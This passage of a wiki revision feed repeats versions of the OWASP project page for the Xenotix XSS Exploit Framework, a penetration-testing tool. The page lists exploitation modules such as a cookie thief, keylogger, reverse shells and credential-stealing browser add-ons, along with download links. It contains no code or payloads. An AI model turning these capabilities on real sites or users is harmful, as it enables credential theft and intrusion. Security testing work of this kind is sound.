* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Download.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]&lt;br /&gt;
&lt;br /&gt;
Requirements&lt;br /&gt;
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Version 5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|loZSdedJnqc}}&lt;br /&gt;
&lt;br /&gt;
'''Version 4.5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|jm1-_nTlhzY}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 4 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|dCo5BCJWOdA}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 3 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|CJEgO4_kd-8}} &lt;br /&gt;
{{#ev:youtube|owfF9C_Xerw}} &lt;br /&gt;
{{#ev:youtube|i8c3kf4t6A8}} &lt;br /&gt;
{{#ev:youtube|IT-8IH3yRrA}} &lt;br /&gt;
{{#ev:youtube|cgLGgVWvi9Y}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:Projects/OWASP Xenotix XSS Exploit Framework | Project About}}&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=172230</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=172230"/>
				<updated>2014-04-10T11:30:57Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework 5==&lt;br /&gt;
&lt;br /&gt;
[[Image:XenotixV5.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1600+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. Xenotix Scripting Engine allows you to create custom test cases and addons over the Xenotix API. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Download.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
* [[OWASP_AntiSamy_Project]]&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Manual Mode&lt;br /&gt;
*GET Request Auto Mode&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
*Multiple Parameter Scanner&lt;br /&gt;
*POST Request Scanner&lt;br /&gt;
*Request Repeater&lt;br /&gt;
*URL Fuzzer&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
*Browser Fingerprinting&lt;br /&gt;
*Browser Features Detector&lt;br /&gt;
*Get Network IP&lt;br /&gt;
*Ping Scan&lt;br /&gt;
*Port Scan&lt;br /&gt;
*Internal Network Scan&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Phisher&lt;br /&gt;
*Tabnabbing&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*Gram WebCam Screenshot&lt;br /&gt;
*Executable Drive By&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Drive-By Reverse Shell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Firefox Reverse Shell Addon (Persistent)&lt;br /&gt;
*Firefox Session Stealer Addon (Persistent)&lt;br /&gt;
*Firefox Keylogger Addon (Persistent)&lt;br /&gt;
*Firefox DDoSer Addon (Persistent)&lt;br /&gt;
*Firefox Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
*Firefox Download and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''UTILITY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Payload Encoder&lt;br /&gt;
*JavaScript Beautify&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Download.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]&lt;br /&gt;
&lt;br /&gt;
Requirements&lt;br /&gt;
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Version 5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|loZSdedJnqc}}&lt;br /&gt;
&lt;br /&gt;
'''Version 4.5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|jm1-_nTlhzY}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 4 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|dCo5BCJWOdA}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 3 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|CJEgO4_kd-8}} &lt;br /&gt;
{{#ev:youtube|owfF9C_Xerw}} &lt;br /&gt;
{{#ev:youtube|i8c3kf4t6A8}} &lt;br /&gt;
{{#ev:youtube|IT-8IH3yRrA}} &lt;br /&gt;
{{#ev:youtube|cgLGgVWvi9Y}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:Projects/OWASP Xenotix XSS Exploit Framework | Project About}}&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=171611</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=171611"/>
				<updated>2014-04-04T17:40:16Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework 5==&lt;br /&gt;
&lt;br /&gt;
[[Image:XenotixV5.png|left|600px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1600+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. Xenotix Scripting Engine allows you to create custom test cases and addons over the Xenotix API. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
